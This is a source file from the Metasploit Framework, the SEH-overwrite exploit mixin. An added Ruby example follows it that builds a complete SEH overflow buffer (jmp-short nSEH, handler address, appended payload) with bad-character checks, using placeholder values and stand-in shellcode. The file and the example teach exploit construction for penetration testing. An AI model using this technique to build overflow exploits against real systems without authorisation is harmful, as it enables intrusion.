GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/msf/core/exploit/seh.rb
# -*- coding: binary -*-
require 'rex/exploitation/seh'

module Msf

###
#
# This mixin provides an interface to generating SEH registration records in a
# robust fashion using the Rex::Exploitation::Seh class.
#
###
module Exploit::Seh

  #
  # Creates an instance of an exploit that uses an SEH overwrite.
  #
  def initialize(info = {})
    super

    # Register an advanced option that allows users to specify whether or
    # not a dynamic SEH record should be used.
    register_advanced_options(
      [
        OptBool.new('DynamicSehRecord', [ false, "Generate a dynamic SEH record (more stealthy)", false ])
      ], Msf::Exploit::Seh)
  end

  #
  # Generates an SEH record with zero or more options. The supported options
  # are:
  #
  # NopGenerator
  #
  #   The NOP generator instance to use, if any.
  #
  # Space
  #
  #   The amount of room the SEH record generator has to play with for
  #   random padding. This should be derived from the maximum amount of
  #   space available to the exploit for payloads minus the current payload
  #   size.
  #
  def generate_seh_record(handler, opts = {})
    seh = Rex::Exploitation::Seh.new(
      payload_badchars,
      opts['Space'] || payload_space,
      opts['NopGenerator'] || nop_generator)

    # Generate the record
    seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
  end

  def generate_seh_payload(handler, opts = {})

    # The boilerplate this replaces always has 8 bytes for seh + addr
    seh_space = 8 + payload.nop_sled_size

    seh = Rex::Exploitation::Seh.new(
      payload_badchars,
      seh_space,
      opts['NopGenerator'] || nop_generator)

    # Generate the record
    rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord'])

    # Append the payload, minus the nop sled that we replaced
    rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)
  end

end

end
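The mixin above delegates the actual bytes to Rex::Exploitation::Seh, so the file never shows what the "8 bytes for seh + addr" in generate_seh_payload look like or why the payload can simply be appended after them. The following stand-alone Ruby is an added example written for this page; it is not the framework's code and does not call Rex. It models the classic static record (a short jmp in the nSEH slot, two filler bytes, then the handler address) and mirrors generate_seh_payload by dropping the encoded payload's NOP sled and placing the payload right after the record. The bad-character set, the handler address 0x10203040, the offset 268 and the NOP sled and shellcode stand-ins are all constructed for illustration. The dynamic record that the DynamicSehRecord option selects is not modelled here.

```ruby
# Added example (not framework code): a stand-alone model of the static,
# 8-byte SEH record that Msf::Exploit::Seh asks Rex::Exploitation::Seh to
# produce, plus the checks a module author wants before sending it.
#
# Layout of the record as it lands on the overwritten registration:
#   offset 0..1  nSEH  "\xeb\x06"  jmp short +6 (skips the next 6 bytes)
#   offset 2..3  nSEH  2 filler bytes (must avoid the bad characters)
#   offset 4..7  SEH   handler address, little-endian (e.g. a POP/POP/RET)
#   offset 8..   payload, which is exactly where the jmp lands

# Constructed bad-character set for a hypothetical target.
BADCHARS = "\x00\x0a\x0d".b

# Return n random bytes drawn from the bytes that are not bad characters.
def rand_filler(n, badchars)
  pool = (0..255).to_a - badchars.bytes
  raise ArgumentError, 'no usable filler bytes' if pool.empty?
  Array.new(n) { pool.sample }.pack('C*')
end

# Build the 8-byte static record for the given handler address. Both the
# jmp opcode bytes and the packed address are checked against badchars.
def seh_record(handler, badchars)
  nseh_jmp = [0xeb, 0x06].pack('C*')
  addr = [handler].pack('V')
  bad = (nseh_jmp.bytes + addr.bytes) & badchars.bytes
  unless bad.empty?
    raise ArgumentError, format('record for handler 0x%08x contains bad byte(s) %s',
                                handler, bad.map { |b| format('0x%02x', b) }.join(','))
  end
  nseh_jmp + rand_filler(2, badchars) + addr
end

# Decode the rel8 displacement in nSEH and return where execution resumes,
# as a byte offset from the start of the record. A correct record gives 8.
def jmp_short_target(record)
  raise ArgumentError, 'nSEH does not start with a short jmp' unless record.getbyte(0) == 0xeb
  disp = record.getbyte(1)
  disp -= 256 if disp > 127   # rel8 is signed
  2 + disp
end

# Mirror generate_seh_payload: the record takes the place of the encoded
# payload's NOP sled, and the rest of the payload follows it directly.
def seh_payload(handler, badchars, nop_sled_size, encoded)
  seh_record(handler, badchars) + encoded.byteslice(nop_sled_size, encoded.bytesize)
end

# Full overflow buffer: filler up to the registration record, the record,
# then the payload. offset_to_nseh is assumed known from crash analysis.
def overflow_buffer(offset_to_nseh, handler, badchars, nop_sled_size, encoded)
  ('A'.b * offset_to_nseh) + seh_payload(handler, badchars, nop_sled_size, encoded)
end

# Pre-flight checks: no bad characters from the record onward, and the
# short jmp lands on the first payload byte.
def buffer_ok?(buf, offset_to_nseh, badchars)
  tail = buf.byteslice(offset_to_nseh, buf.bytesize)
  return false unless (tail.bytes & badchars.bytes).empty?
  jmp_short_target(tail) == 8
end

if __FILE__ == $0
  sled = "\x90".b * 16        # constructed NOP sled the record replaces
  shellcode = "\xcc".b * 32   # constructed stand-in for the encoded payload
  buf = overflow_buffer(268, 0x10203040, BADCHARS, sled.bytesize, sled + shellcode)
  puts format('%d bytes, checks %s', buf.bytesize, buffer_ok?(buf, 268, BADCHARS) ? 'pass' : 'FAIL')
end
```

The point worth taking from the jmp_short_target check is that the displacement is counted from the end of the two-byte jmp, so "\xeb\x06" lands at record offset 8, which is why the mixin can append payload.encoded minus its sled with nothing in between. The handler address is validated the same way as the payload bytes because a gadget address containing a bad character is the most common reason an otherwise correct SEH exploit dies silently.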